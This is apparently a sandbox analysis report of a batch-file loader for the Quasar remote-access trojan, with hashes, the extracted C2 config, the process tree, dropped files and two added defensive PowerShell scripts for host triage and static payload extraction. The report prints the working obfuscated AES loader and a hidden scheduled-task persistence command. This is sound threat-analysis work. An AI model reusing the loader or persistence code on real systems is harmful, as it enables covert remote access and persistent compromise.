Analysis
max time kernel: 147s
max time network: 150s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 10-06-2024 14:58
Static task: static1
General
Target: API_Connector.bat
Size: 586KB
MD5: 54b83bd573c13cd414255d487f47b770
SHA1: f35b29215c9039af7294b1e9db7977447f380cbe
SHA256: fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926
SHA512: 8c607148b7e001d5ea9efb048cebf3fc78238f333cc09c368078f77b0d0fcf4ac22a5594bd7417515ee4ea73e7943fb1e47232e9caac6e3e74caa3313c89f6d9
SSDEEP: 12288:LiR+aj62WqH39ttfD1KhLZ6azySThfOwppoCQ/gcOhKrYFuuZUDGO0:mQt2WwxGJtvpOt/owriUDt0
Malware Config
Extracted
Family: quasar
Version: 1.3.0.0
Botnet: Slave
C2: runderscore00-61208.portmap.host:61208 (portmap.host is a public port-forwarding service; the operator's real address sits behind it, and the forwarded port is repeated in the hostname)
Mutex: QSR_MUTEX_cq1PvE2FSZsrtLytho
encryption_key: 5vXgZSbIpHJzAn3ZrosQ
install_name: $phantom-powershell.exe
log_directory: $phantom-Logs
reconnect_delay: 3000
startup_key: Powershell
subdirectory: $phantom-zero
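The values above are directly usable as host indicators. The script below is an added example, not part of this report and not Quasar's or the sample's code: it checks a Windows host for the mutex, for the stdin-fed "powershell.exe -w hidden" processes the process tree records, for the persistence recorded further down (scheduled task '$phantom-RuntimeBroker_startup_57_str' launching a .vbs from AppData\Roaming at logon with RunLevel Highest) as well as Quasar's own persistence under the startup_key name (a Run value, or a scheduled task of that name when the client runs elevated), for the install_name/subdirectory/log_directory paths and the $phantom-startup_str_ drop files, and for DNS and TCP traces of the portmap.host C2. Indicator strings are the report's; the function names, the generic "logon task running a script from Roaming" heuristic and the set of install base directories searched are my assumptions. It relies on the ScheduledTasks, NetTCPIP and DnsClient modules that ship with Windows 8 and later.

```powershell
# Added host-triage example for the Quasar config in this report (not the report's code).
$Ioc = @{
    Mutex       = 'QSR_MUTEX_cq1PvE2FSZsrtLytho'
    C2Host      = 'runderscore00-61208.portmap.host'
    C2Port      = 61208
    StartupKey  = 'Powershell'                         # Quasar uses startup_key as Run-value / task name
    InstallName = '$phantom-powershell.exe'
    SubDir      = '$phantom-zero'
    LogDir      = '$phantom-Logs'
    TaskName    = '$phantom-RuntimeBroker_startup_57_str'
    DropPrefix  = '$phantom-startup_str_'              # $phantom-startup_str_57.vbs / .bat in Roaming
}

function Test-QuasarMutex {
    # A running client holds this mutex; access-denied on open still proves it exists.
    try { ([Threading.Mutex]::OpenExisting($Ioc.Mutex)).Dispose(); return $true }
    catch { return ($_.Exception.GetBaseException() -is [UnauthorizedAccessException]) }
}

function Get-StdinFedPowerShell {
    # The loader is piped in from cmd's echo, so the command line shows only "-w hidden".
    Get-CimInstance Win32_Process -Filter "Name='powershell.exe'" |
        Where-Object { $_.CommandLine -match '^\s*"?[^"]*powershell\.exe"?\s+-w(indowstyle)?\s+hidden\s*$' } |
        Select-Object ProcessId, ParentProcessId, CommandLine
}

function Get-SuspiciousLogonTask {
    # Exact task names from the report, plus the shape of its task (assumed generic heuristic):
    # logon trigger, RunLevel Highest, action is a script under AppData\Roaming.
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $t = $_
        $action  = ($t.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join ' ; '
        $atLogon = [bool]($t.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
        $generic = $atLogon -and ($t.Principal.RunLevel -eq 'Highest') -and
                   ($action -match '\\AppData\\Roaming\\.*\.(vbs|bat|cmd|ps1)\b')
        if (($t.TaskName -in @($Ioc.TaskName, $Ioc.StartupKey)) -or $generic) {
            [pscustomobject]@{ Task = $t.TaskPath + $t.TaskName; Hidden = $t.Settings.Hidden; Action = $action }
        }
    }
}

function Get-QuasarRunValue {
    # Non-elevated Quasar persists as a Run value named after startup_key.
    foreach ($hive in 'HKCU:', 'HKLM:') {
        $key = "$hive\Software\Microsoft\Windows\CurrentVersion\Run"
        $val = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).($Ioc.StartupKey)
        if ($val) { [pscustomobject]@{ Key = $key; Name = $Ioc.StartupKey; Command = $val } }
    }
}

function Get-QuasarDropFile {
    # Quasar installs to <base>\<subdirectory>\<install_name>; the base is a build option,
    # so the usual bases are all checked (assumed list). The Roaming drops come from this loader.
    $names = @($Ioc.SubDir, $Ioc.LogDir, $Ioc.InstallName)
    foreach ($base in @($env:APPDATA, $env:LOCALAPPDATA, $env:ProgramFiles, $env:SystemRoot) | Where-Object { $_ }) {
        Get-ChildItem -LiteralPath $base -Force -ErrorAction SilentlyContinue |
            Where-Object { ($_.Name -in $names) -or $_.Name.StartsWith($Ioc.DropPrefix) }
        $sub = Join-Path $base $Ioc.SubDir
        if (Test-Path -LiteralPath $sub) { Get-ChildItem -LiteralPath $sub -Force -ErrorAction SilentlyContinue }
    }
}

function Get-QuasarNetworkSign {
    Get-DnsClientCache -ErrorAction SilentlyContinue |
        Where-Object { $_.Entry -eq $Ioc.C2Host -or $_.Entry -like '*.portmap.host' } |
        Select-Object Entry, Data
    Get-NetTCPConnection -RemotePort $Ioc.C2Port -ErrorAction SilentlyContinue |
        Select-Object RemoteAddress, RemotePort, State, OwningProcess
}

$findings = [pscustomobject]@{
    MutexPresent    = Test-QuasarMutex
    StdinPowerShell = @(Get-StdinFedPowerShell)
    LogonTasks      = @(Get-SuspiciousLogonTask)
    RunValues       = @(Get-QuasarRunValue)
    DropFiles       = @(Get-QuasarDropFile | Select-Object -ExpandProperty FullName)
    Network         = @(Get-QuasarNetworkSign)
}
$findings | Format-List
```

Run it in the user session that was infected (the mutex and the HKCU Run value are per-session and per-user). The task heuristic intentionally catches more than this sample: any at-logon, highest-privilege task whose action is a script in the user's Roaming profile deserves a look, and a non-empty result in any field is enough to pull the host for a memory capture of the powershell.exe that owns the mutex or the C2 connection.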
Signatures
Quasar payload (1 IoC)
  resource / yara_rule: behavioral1/memory/3348-144-0x0000027A6A0A0000-0x0000027A6A0FE000-memory.dmp / family_quasar
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
  Run Powershell and hide display window.
  pid / process: 3348 powershell.exe; 4012 powershell.exe; 880 powershell.exe
Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc: 1 ip-api.com; 6 api.ipify.org
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Modifies data under HKEY_USERS (1 IoC)
  description / ioc / process: Key created / \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections / svchost.exe
Modifies registry class (1 IoC)
  description / ioc / process: Key created / \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings / powershell.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid / process: 4012 powershell.exe (2 entries); 880 powershell.exe (2 entries); 3348 powershell.exe (all remaining entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description / pid / process:
  Token: SeDebugPrivilege / 4012 / powershell.exe
  Token: SeDebugPrivilege / 880 / powershell.exe
  then, for 880 powershell.exe, three passes over the same 21 tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the 64-entry listing ends in the third pass after token 35)
Suspicious use of FindShellTrayWindow (3 IoCs)
  pid / process: 3200 Explorer.EXE (3 entries)
Suspicious use of SendNotifyMessage (3 IoCs)
  pid / process: 3200 Explorer.EXE (3 entries)
Suspicious use of SetWindowsHookEx (1 IoC)
  pid / process: 3348 powershell.exe
Suspicious use of WriteProcessMemory (62 IoCs)
  description: PID <source> wrote to memory of <target>. Each parent-to-child pair below appears twice in the report; those are ordinary process creation. The writes from 3348 into Explorer.EXE and 47 svchost.exe processes are not, and the same 64KB region 0x00007FF972AD0000-0x00007FF972AE0000 is later dumped from 16 of those targets (see the memory dumps under Downloads).
  4720 cmd.exe -> 4168 cmd.exe
  4720 cmd.exe -> 4012 powershell.exe
  4012 powershell.exe -> 880 powershell.exe
  4012 powershell.exe -> 1160 WScript.exe
  1160 WScript.exe -> 1988 cmd.exe
  1988 cmd.exe -> 2460 cmd.exe
  1988 cmd.exe -> 3348 powershell.exe
  3348 powershell.exe -> 3200 Explorer.EXE
  3348 powershell.exe -> svchost.exe pids 2844, 1560, 1752, 1948, 3720, 1352, 1744, 3376, 2520, 1132, 932, 1124, 2692, 3956, 1108, 1600, 2484, 2680, 3404, 2284, 1296, 2476, 1288, 2664, 1084, 2056, 708, 4612, 1652, 2532, 1252, 948, 2032, 1636, 1436, 1040, 2024, 1816, 2364, 1808, 820, 2196, 2588, 1208, 1196, 992, 4416 (one entry each)
Processes
Tree depth is shown as [n]. The pid annotations are derived from the WriteProcessMemory parent/child records in the Signatures section.
[1] C:\Windows\system32\svchost.exe -k DcomLaunch -p
[1] C:\Windows\system32\svchost.exe -k RPCSS -p
[1] C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
[1] C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
[1] C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
[1] C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
[1] C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
[1] C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
[1] C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
[1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
[1] C:\Windows\system32\svchost.exe -k NetworkService -p
[1] C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
[1] C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
[1] C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
[1] C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
[1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
[1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
[1] C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
[1] C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
[1] C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
[1] C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
[1] C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
[1] C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
[1] C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
[1] C:\Windows\system32\svchost.exe -k NetworkService -p
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
[1] C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
[1] C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
[1] C:\Windows\Explorer.EXE (pid 3200)
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    [2] C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\API_Connector.bat" (pid 4720)
        - Suspicious use of WriteProcessMemory
        [3] (pid 4168; the echo side of a pipe that feeds the loader script to the powershell.exe below on stdin)
            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Local\Temp\API_Connector.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        [3] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden (pid 4012; the script never appears on its command line because it arrives on stdin)
            - Command and Scripting Interpreter: PowerShell
            - Modifies registry class
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            [4] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_57_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force (pid 880)
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
            [4] "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs" (pid 1160)
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat" " (pid 1988; the .bat is a byte-identical copy of API_Connector.bat, see Downloads)
                    - Suspicious use of WriteProcessMemory
                    [6] (pid 2460; the echo side of the second pipe)
                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                    [6] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden (pid 3348; the process in which the family_quasar rule matched, and the source of the writes into Explorer.EXE and the svchost.exe processes)
                        - Command and Scripting Interpreter: PowerShell
                        - Suspicious behavior: EnumeratesProcesses
                        - Suspicious use of SetWindowsHookEx
                        - Suspicious use of WriteProcessMemory
[1] C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
[1] C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
[1] C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
[1] C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
[1] C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
[1] C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
[1] C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
    - Modifies data under HKEY_USERS
[1] C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
[1] C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
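The loader that the two cmd.exe /S /D /c" echo ..." entries above pipe into powershell.exe -w hidden works as follows: it reads its own .bat, keeps the one line that starts with the 20-character marker gXDGnOjJvtwCvUiJRmac, splits the remainder at '\', reverses a character substitution ('#' back to '/', '@' back to 'A'), base64-decodes each chunk, decrypts it with AES-256-CBC/PKCS7 under a key and IV hardcoded in the script, gunzips it, and hands the result to Assembly.Load followed by EntryPoint.Invoke (payload 1 with no arguments, payload 2 with a one-element string array). Method names are assembled from reversed strings ('gnirtS46esaBmorF', 'daoL', 'txeTllAdaeR') to defeat keyword matching, and because the script arrives on stdin the powershell.exe command line shows nothing but -w hidden. The script below is an added example, not the report's code and not the sample's: it re-implements that decode chain statically and writes the decoded payloads to disk instead of loading them. Key, IV, marker and substitutions are copied from the recorded command line; the function names are mine, and the .bat it builds for its self-test is constructed data, not the real sample.

```powershell
# Added static extractor for the loader recorded in this report (not the sample's own code).
$Key    = [Convert]::FromBase64String('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ=')  # 32 bytes: AES-256
$IV     = [Convert]::FromBase64String('bUSTj74gvGgYEhrqOpYzuQ==')                      # 16 bytes
$Marker = 'gXDGnOjJvtwCvUiJRmac'   # the loader keeps only the .bat line starting with this

function Invoke-AesCbc {
    # AES-CBC/PKCS7 under the loader's fixed key and IV; -Encrypt is used only by the self-test.
    param([byte[]]$Data, [switch]$Encrypt)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $xf = if ($Encrypt) { $aes.CreateEncryptor() } else { $aes.CreateDecryptor() }
    try     { $result = $xf.TransformFinalBlock($Data, 0, $Data.Length) }
    finally { $xf.Dispose(); $aes.Dispose() }
    return ,$result
}

function Expand-Gzip {
    param([byte[]]$Data)
    $src = New-Object System.IO.MemoryStream(,$Data)
    $dst = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($src, [IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($dst)
    $gz.Dispose(); $src.Dispose()
    $bytes = $dst.ToArray(); $dst.Dispose()
    return ,$bytes
}

function Compress-Gzip {
    param([byte[]]$Data)
    $dst = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($dst, [IO.Compression.CompressionMode]::Compress)
    $gz.Write($Data, 0, $Data.Length)
    $gz.Dispose()                          # Dispose flushes the gzip trailer into $dst
    $bytes = $dst.ToArray(); $dst.Dispose()
    return ,$bytes
}

function ConvertFrom-LoaderChunk {
    # One '\'-separated chunk, decoded exactly as the loader does it:
    # undo the character substitution, base64-decode, AES-decrypt, gunzip.
    param([string]$Chunk)
    $b64 = $Chunk.Replace('#', '/').Replace('@', 'A')
    $enc = [Convert]::FromBase64String($b64)
    return ,(Expand-Gzip (Invoke-AesCbc -Data $enc))
}

function Export-LoaderPayloads {
    # Writes payload1.bin, payload2.bin, ... into $OutDir and returns their paths. Nothing is executed.
    param([string]$BatPath, [string]$OutDir)
    $line = [IO.File]::ReadAllLines($BatPath) | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $line) { throw "marker line not found in $BatPath" }
    $chunks = $line.Substring($Marker.Length).Split('\')
    for ($i = 0; $i -lt $chunks.Length; $i++) {
        $path = Join-Path $OutDir ("payload{0}.bin" -f ($i + 1))
        [IO.File]::WriteAllBytes($path, (ConvertFrom-LoaderChunk $chunks[$i]))
        $path
    }
}

# ---- self-test on constructed data: the encode side is the exact inverse of the loader ----
function ConvertTo-LoaderChunk {
    param([byte[]]$Plain)
    $b64 = [Convert]::ToBase64String((Invoke-AesCbc -Data (Compress-Gzip $Plain) -Encrypt))
    return $b64.Replace('/', '#').Replace('A', '@')   # '#' and '@' never occur in base64, so this is lossless
}

$dir = Join-Path ([IO.Path]::GetTempPath()) 'loader-demo'
New-Item -ItemType Directory -Force -Path $dir | Out-Null
$p1  = [Text.Encoding]::ASCII.GetBytes('constructed stand-in for payload 1')
$p2  = [Text.Encoding]::ASCII.GetBytes('constructed stand-in for payload 2')
$bat = Join-Path $dir 'sample.bat'
@('@echo off', 'rem constructed stand-in for API_Connector.bat',
  ($Marker + (ConvertTo-LoaderChunk $p1) + '\' + (ConvertTo-LoaderChunk $p2))) |
  Set-Content -LiteralPath $bat -Encoding ASCII

$outFiles = @(Export-LoaderPayloads -BatPath $bat -OutDir $dir)
$ok = (([IO.File]::ReadAllBytes($outFiles[0]) -join ',') -eq ($p1 -join ',')) -and
      (([IO.File]::ReadAllBytes($outFiles[1]) -join ',') -eq ($p2 -join ','))
"round-trip ok: $ok; payloads written to $dir"
```

Pointed at a copy of API_Connector.bat or $phantom-startup_str_57.bat instead of the constructed sample, Export-LoaderPayloads yields two files that should each begin with MZ (the loader passes them to Assembly.Load, so they are .NET assemblies) and can be opened in a .NET decompiler; payload2 is the one the loader starts with an argument vector. If a future build rotates the key, IV or marker, those three constants are the only lines to change.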
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (3KB; CLR usage log, a by-product of powershell.exe running managed code)
  MD5: df472dcddb36aa24247f8c8d8a517bd7
  SHA1: 6f54967355e507294cbc86662a6fbeedac9d7030
  SHA256: e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
  SHA512: 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive (1KB)
  MD5: 3ec0d76d886b2f4b9f1e3da7ce9e2cd7
  SHA1: 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
  SHA256: 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
  SHA512: a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcsytksq.twb.ps1 (60B; PowerShell's own startup probe for AppLocker/WDAC script policy, not a sample artifact)
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat (586KB; the hashes are identical to API_Connector.bat, so the first stage copies itself unchanged into Roaming for the scheduled-task relaunch)
  MD5: 54b83bd573c13cd414255d487f47b770
  SHA1: f35b29215c9039af7294b1e9db7977447f380cbe
  SHA256: fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926
  SHA512: 8c607148b7e001d5ea9efb048cebf3fc78238f333cc09c368078f77b0d0fcf4ac22a5594bd7417515ee4ea73e7943fb1e47232e9caac6e3e74caa3313c89f6d9
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs (123B; the scheduled task's action, which runs the .bat copy through cmd.exe as shown in the process tree)
  MD5: 065cc72718daae804e5bea6753652a33
  SHA1: 3243bf10760303cc68da17673be2d2bc9565b464
  SHA256: a49fed4eedf27903821b907776260c8567fd1de66c84689a53a4b55484c87cb7
  SHA512: c237f5d45c75b687fd4dc737617f278639f88671893613e077778cc9210ee0521f17d61c12216c9bfc39de3510241ad33755ff64fa5b37813971225126086326
Memory dumps (memory/<pid>-<index>-<range>)
memory/880-17, 880-18, 880-27, 880-30: 0x00007FF991AE0000-0x00007FF9925A2000, 10.8MB each
memory/4012-10, 4012-11, 4012-12, 4012-95: 0x00007FF991AE0000-0x00007FF9925A2000, 10.8MB each
memory/4012-0: 0x00007FF991AE3000-0x00007FF991AE5000, 8KB
memory/4012-9: 0x0000023F97FF0000-0x0000023F98012000, 136KB
memory/4012-13: 0x0000023FB05D0000-0x0000023FB0616000, 280KB
memory/4012-14: 0x0000023FB0360000-0x0000023FB0368000, 32KB
memory/4012-15: 0x0000023FB0620000-0x0000023FB0690000, 448KB
memory/3200-47: 0x00000000063A0000-0x00000000063CA000, 168KB
memory/3348-144: 0x0000027A6A0A0000-0x0000027A6A0FE000, 376KB (the region matched by the family_quasar YARA rule; the best candidate for carving the client assembly)
memory/3348-145: 0x0000027A6A130000-0x0000027A6A142000, 72KB
memory/3200-96, 2844-97, 3404-98, 2284-99, 1296-100, 1652-101, 2532-102, 1252-103, 1948-104, 1560-105, 3720-106, 1352-107, 1196-108, 3376-109, 932-110, 1124-111: 0x00007FF972AD0000-0x00007FF972AE0000, 64KB each. The same region at the same address in Explorer.EXE (3200) and 15 svchost.exe processes, every one of them a WriteProcessMemory target of pid 3348.